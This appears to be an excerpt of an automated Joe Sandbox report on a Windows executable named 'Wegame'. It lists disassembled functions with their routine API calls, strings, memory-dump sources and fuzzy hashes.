                                                                • Instruction ID: 2a7c2cc5d2381677268fb62491feb68e9c910af3e3475664891346cad0a3e47c
                                                                • Opcode Fuzzy Hash: 10f82e3c39b7d8422185b3dac310fd4f0bbb42750b5ef967f64d09a1c7787b33
                                                                • Instruction Fuzzy Hash: 0E015E34A00204DFDB04EFA1D895BAD77B1EF05318F1480ADA456972A2DF389E49DB19
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041C9C0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 408COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$DebugOutputString
                                                                • String ID: VFileSysBase::WriteFile() $VFileSysBase::WriteFile() $list<T> too long
                                                                • API String ID: 1905100485-2447007464
                                                                • Opcode ID: d43e8bea9776622e7b7a54812aec3ca65c7963a625c38888cec54e331efd986a
                                                                • Instruction ID: 3ba161843ec1cad1465ab53ac819f3383479070beb727a0755847bf88ac195ce
                                                                • Opcode Fuzzy Hash: d43e8bea9776622e7b7a54812aec3ca65c7963a625c38888cec54e331efd986a
                                                                • Instruction Fuzzy Hash: 0C020675A00208DFCB14CFA9D9C1AAEBBF5FF49304F14456EE809AB352D734A985CB58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004181D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 209COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,0041817E,?,85A35C35,?,?,?,?,85A35C35), ref: 004181F1
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,0041817E,?,85A35C35,?,?,?,?,85A35C35), ref: 0041825B
                                                                • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,0041817E,?,85A35C35,?,?,?,?,85A35C35), ref: 0041828F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Xlength_error@std@@_invalid_parameter_noinfo_noreturnfree
                                                                • String ID: map/set<T> too long
                                                                • API String ID: 2444646146-1285458680
                                                                • Opcode ID: ef66dbbc96b5c3c15c1f4decd63ee2bf6e35463cc6b46ad0a410a1c7dada20a2
                                                                • Instruction ID: f78b734310909345db59317530a433d620edec2689ece990f0742b5cccadc700
                                                                • Opcode Fuzzy Hash: ef66dbbc96b5c3c15c1f4decd63ee2bf6e35463cc6b46ad0a410a1c7dada20a2
                                                                • Instruction Fuzzy Hash: 928125706006448FD715CF19C588A96FBE1BF09714F29C59EE85D8B362CB7AEC82CB58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00410560 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,85A35C35), ref: 004105E7
                                                                • FindClose.KERNEL32(00000000,?,?,85A35C35), ref: 00410693
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseFind_invalid_parameter_noinfo_noreturnmalloc
                                                                • String ID: _H$_H
                                                                • API String ID: 208310793-427058975
                                                                • Opcode ID: 4ae7082b358849f393c001e0c3c03c120efa574c2af33f6a52bbdc056a49a2d2
                                                                • Instruction ID: 5f3c0bd2b38b2366bb5f87bc852621b52e0c0bf888910caed30bc076056872c0
                                                                • Opcode Fuzzy Hash: 4ae7082b358849f393c001e0c3c03c120efa574c2af33f6a52bbdc056a49a2d2
                                                                • Instruction Fuzzy Hash: 3941FE71A001059FDB10EF68C905BEF77A6EBA9728F50412BE805DB390E7B9D9C0C768
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004621D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004621DB
                                                                • GetEnvironmentVariableW.KERNEL32(Path,00000000,00000000,00000034), ref: 00462205
                                                                • GetEnvironmentVariableW.KERNEL32(Path,?,?), ref: 00462245
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: EnvironmentVariable$H_prolog3_
                                                                • String ID: Path
                                                                • API String ID: 3605364767-2875597873
                                                                • Opcode ID: be0da37dea37a51cedb64b2ea7d83027a6c2d2ec1335798da0cd5174a536f8a8
                                                                • Instruction ID: ad132ec14f0f7a898537de1f9f2a0c91724b42d0a4172727f55922428f854f54
                                                                • Opcode Fuzzy Hash: be0da37dea37a51cedb64b2ea7d83027a6c2d2ec1335798da0cd5174a536f8a8
                                                                • Instruction Fuzzy Hash: 57214271D10209EFCF04DFA4C855BDDBBB4AF08314F54016AE115F7191E7786A45CBAA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00418AA0 Relevance: 6.3, APIs: 5, Instructions: 78COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(004A8F78,00000000,?,?,00417E6D,?,?,?,00000000,?,?,?,00472600,000000FF,?,0041591A), ref: 00418AAB
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00417E6D,?,?,?,00000000,?,?,?,00472600,000000FF,?,0041591A,?,?), ref: 00418AEC
                                                                • LeaveCriticalSection.KERNEL32(004A8F78), ref: 00418AF9
                                                                • LeaveCriticalSection.KERNEL32(004A8F78,?,00417E6D,?,?,?,00000000,?,?,?,00472600,000000FF,?,0041591A,?,?), ref: 00418B34
                                                                • LeaveCriticalSection.KERNEL32(004A8F78,?,00417E6D,?,?,?,00000000,?,?,?,00472600,000000FF,?,0041591A,?,?), ref: 00418B62
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$Leave$Enterfree
                                                                • String ID:
                                                                • API String ID: 3634772007-0
                                                                • Opcode ID: b90086e96675e7c722dbd8d714e8c04ce279348fea110cd856a7562355f0a631
                                                                • Instruction ID: 0b97afb154c658fb9236bf58c6c4c707b249f88e837a5591f778d8f2a116526a
                                                                • Opcode Fuzzy Hash: b90086e96675e7c722dbd8d714e8c04ce279348fea110cd856a7562355f0a631
                                                                • Instruction Fuzzy Hash: 403102B5601A02EFC304CF29D584A56FBB0FF9A325B14C26AE5198B701D775E8A1CFD4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004189C0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(004A8F78,?,85A35C35,?,00415408,?,?,85A35C35,?,0041DCF1,?,85A35C35,?,?,?,?), ref: 004189C9
                                                                • LeaveCriticalSection.KERNEL32(004A8F78,?,0041DCF1,?,85A35C35,?,?,?,?,00000000,?,?,85A35C35,?,?,00000001), ref: 00418A1E
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(-0000000C,?,0041DCF1,?,85A35C35,?,?,?,?,00000000,?,?,85A35C35,?,?,00000001), ref: 00418A30
                                                                • LeaveCriticalSection.KERNEL32(004A8F78,?,?,00000000,?,?,85A35C35,?,?,00000001), ref: 00418A63
                                                                • LeaveCriticalSection.KERNEL32(004A8F78,?,?,00000000,?,?,85A35C35,?,?,00000001), ref: 00418A88
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$Leave$Entermalloc
                                                                • String ID:
                                                                • API String ID: 3130977980-0
                                                                • Opcode ID: 14fc1554bde0557481bd55050f217d989e60ef406251548c7d14104e065b12da
                                                                • Instruction ID: 9128c8b9fc889244392de557cb28fbd87a260ff0fb47d463a3225dbcfa21d214
                                                                • Opcode Fuzzy Hash: 14fc1554bde0557481bd55050f217d989e60ef406251548c7d14104e065b12da
                                                                • Instruction Fuzzy Hash: 1E3108B5601606EFD304CF28D484A85FBB4FF49319F14C26AE41887711C779E8A6CBD0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0043A450 Relevance: 6.2, APIs: 4, Instructions: 164COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memmove.VCRUNTIME140(00000000,?,?,?,?,?,?,00000001,Missing '}' or object member name,00000021,?,00000001), ref: 0043A528
                                                                • memmove.VCRUNTIME140(00000000,?,?,?,?,?,?,00000001,Missing '}' or object member name,00000021,?,00000001), ref: 0043A56F
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,00000001,Missing '}' or object member name,00000021,?,00000001), ref: 0043A598
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000001,Missing '}' or object member name,00000021,?,00000001), ref: 0043A5D8
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmove$_invalid_parameter_noinfo_noreturnmalloc
                                                                • String ID:
                                                                • API String ID: 1886930152-0
                                                                • Opcode ID: b1b97a821acef4858c232858aa4aa6261457e7420c00eb3568abca641c327acf
                                                                • Instruction ID: 580992fbe9d300bde5c5474ba6591eb3772da0f1bbac663b7e195283aa0d8bb0
                                                                • Opcode Fuzzy Hash: b1b97a821acef4858c232858aa4aa6261457e7420c00eb3568abca641c327acf
                                                                • Instruction Fuzzy Hash: 43412972640104AFC724DF28D9C446EB7E5EF89324B20473FE4AAC7381EB34D965879A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0043CE20 Relevance: 6.2, APIs: 4, Instructions: 164COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 0043CE5E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@Pninc@?$basic_streambuf@U?$char_traits@
                                                                • String ID:
                                                                • API String ID: 3551493264-0
                                                                • Opcode ID: 4fbc8a6b7e4ab476ce989919866a224736c818a13e4fafb8a3b246c924703e53
                                                                • Instruction ID: c95ab484f28b58623843dbccda71a19487a5efef89743e121800abdf0669a1bc
                                                                • Opcode Fuzzy Hash: 4fbc8a6b7e4ab476ce989919866a224736c818a13e4fafb8a3b246c924703e53
                                                                • Instruction Fuzzy Hash: DB51DE76A006059FC714CF2DD8C09A9FBA1FF5D320B10426BE81A9BB90D735EC64CB98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00438440 Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(85A35C35,?,00000000), ref: 004384E0
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                  • Part of subcall function 0043B0A0: memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,00000001,00000000), ref: 0043B163
                                                                  • Part of subcall function 0043B0A0: memmove.VCRUNTIME140(00000010,00000000,00000001,00000000,7FFFFFFF,00000000,00000001,00000000), ref: 0043B171
                                                                  • Part of subcall function 0043B0A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,00000000), ref: 0043B1B4
                                                                  • Part of subcall function 0043B0A0: memmove.VCRUNTIME140(00000000,?,00000000,00000001,00000000), ref: 0043B1BC
                                                                  • Part of subcall function 0043B0A0: memmove.VCRUNTIME140(7FFFFFFF,00000000,00000001,00000000,?,00000000,00000001,00000000), ref: 0043B1C8
                                                                • memmove.VCRUNTIME140(00000000,0048BD04,00000001,85A35C35,?,00000000,-00000001,?,?,?,0043817F,?), ref: 0043851B
                                                                • memmove.VCRUNTIME140(?,-00000001,00000000,85A35C35,?,00000000,-00000001,?,?,?,0043817F,?), ref: 0043859F
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,-00000001,00000000,85A35C35), ref: 004385E4
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmove$_invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 2580228974-0
                                                                • Opcode ID: 97ff42d9d0229c68f983094b9063c60cea27d9bb004ffb07662ca7f4d63b32d8
                                                                • Instruction ID: ecc9c8734b14a7c33637c52ce60bb94fb7a6eda2d1fb40299b2e139b6323903a
                                                                • Opcode Fuzzy Hash: 97ff42d9d0229c68f983094b9063c60cea27d9bb004ffb07662ca7f4d63b32d8
                                                                • Instruction Fuzzy Hash: E751B171A00204AFDB14DF68D980BEEBBB5EB49314F24411EF811A7281DB79A945CBA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004103A0 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000,?,?,85A35C35), ref: 004103F2
                                                                • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000200,00000000), ref: 0041041C
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410451
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00410522
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$_waccesswcscpy_s
                                                                • String ID:
                                                                • API String ID: 3811951045-0
                                                                • Opcode ID: b825c10a6e9be966018eceb1defc90318170d0211b5f1fac0ce32c0e6e58ab79
                                                                • Instruction ID: 7df4e832ddbbc62326e42b4c487fd2619298edb7335f2f5ebc5214c12848999a
                                                                • Opcode Fuzzy Hash: b825c10a6e9be966018eceb1defc90318170d0211b5f1fac0ce32c0e6e58ab79
                                                                • Instruction Fuzzy Hash: 97510271A002049BCB14CF68DD88BDE7BB5FF85314F10462AE615AB2D1DBB8A9C5CB58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00470860 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?_Execute_once@std@@YAHAAUonce_flag@1@P6GHPAX1PAPAX@Z1@Z.MSVCP140(004A7FAC,Function_0003DC0C,004A7FB0,85A35C35), ref: 004708B6
                                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0(85A35C35), ref: 004708C2
                                                                • __RTDynamicCast.VCRUNTIME140(?,00000000,004A43B4,004A78EC,00000000,85A35C35), ref: 004708F8
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CastDynamicExecute_once@std@@Uonce_flag@1@terminate
                                                                • String ID:
                                                                • API String ID: 799945358-0
                                                                • Opcode ID: 1100a5acc7dbeced2651a55da063f783dfe2b306191ed6a6e715d5b814105616
                                                                • Instruction ID: 2e372d3d858aa7cc7a225e5597f845a2e72d017333a4fcb2bbcf9573a442812a
                                                                • Opcode Fuzzy Hash: 1100a5acc7dbeced2651a55da063f783dfe2b306191ed6a6e715d5b814105616
                                                                • Instruction Fuzzy Hash: BF31BCB5A04205EFCB10DF58C941FAAFBF4EB99710F20856AF84997341D734E900CBA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00452728 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch.LIBCMT ref: 0045272F
                                                                • _Find_unchecked.LIBCPMT ref: 00452785
                                                                • _Find_unchecked.LIBCPMT ref: 004527BB
                                                                • _CxxThrowException.VCRUNTIME140(00000000,00000000,?,?,0000000C,00000000,00000000,?,?,0000000C,004522F2,?,?,?,00000000), ref: 004527F5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Find_unchecked$ExceptionH_prolog3_catchThrow
                                                                • String ID:
                                                                • API String ID: 3464409187-0
                                                                • Opcode ID: 0f432e5df6149d901b0c9e7f70f284f138627b71c3c2be90aa95632e893ef812
                                                                • Instruction ID: fce1266d4da8e07e5d11c58affdcccc6e68e9a4bac12ecf1581439409669adf9
                                                                • Opcode Fuzzy Hash: 0f432e5df6149d901b0c9e7f70f284f138627b71c3c2be90aa95632e893ef812
                                                                • Instruction Fuzzy Hash: A0210871A00106ABDF04EF79C986AADBBA5EF49304F10411FFD18A7292DB785D108699
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0045265C Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch.LIBCMT ref: 00452663
                                                                • _Find_unchecked.LIBCPMT ref: 004526B4
                                                                • _Find_unchecked.LIBCPMT ref: 004526EA
                                                                • _CxxThrowException.VCRUNTIME140(00000000,00000000,?,?,0000000C,004522F2,?,?,?,00000000), ref: 00452722
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Find_unchecked$ExceptionH_prolog3_catchThrow
                                                                • String ID:
                                                                • API String ID: 3464409187-0
                                                                • Opcode ID: 14883b470a8d842bb5ce0d2d7fe86dfe4df38313fe25255175acaa615ad5868d
                                                                • Instruction ID: c065b6e818b20be14fcfbb0c332ef9c78aa443f9a093179ba6577476079d1575
                                                                • Opcode Fuzzy Hash: 14883b470a8d842bb5ce0d2d7fe86dfe4df38313fe25255175acaa615ad5868d
                                                                • Instruction Fuzzy Hash: 2821D371900106ABCF14AF69C9819AEBB65EF04315F10422FFD18A7292DFB99D109B9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00448975 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                APIs
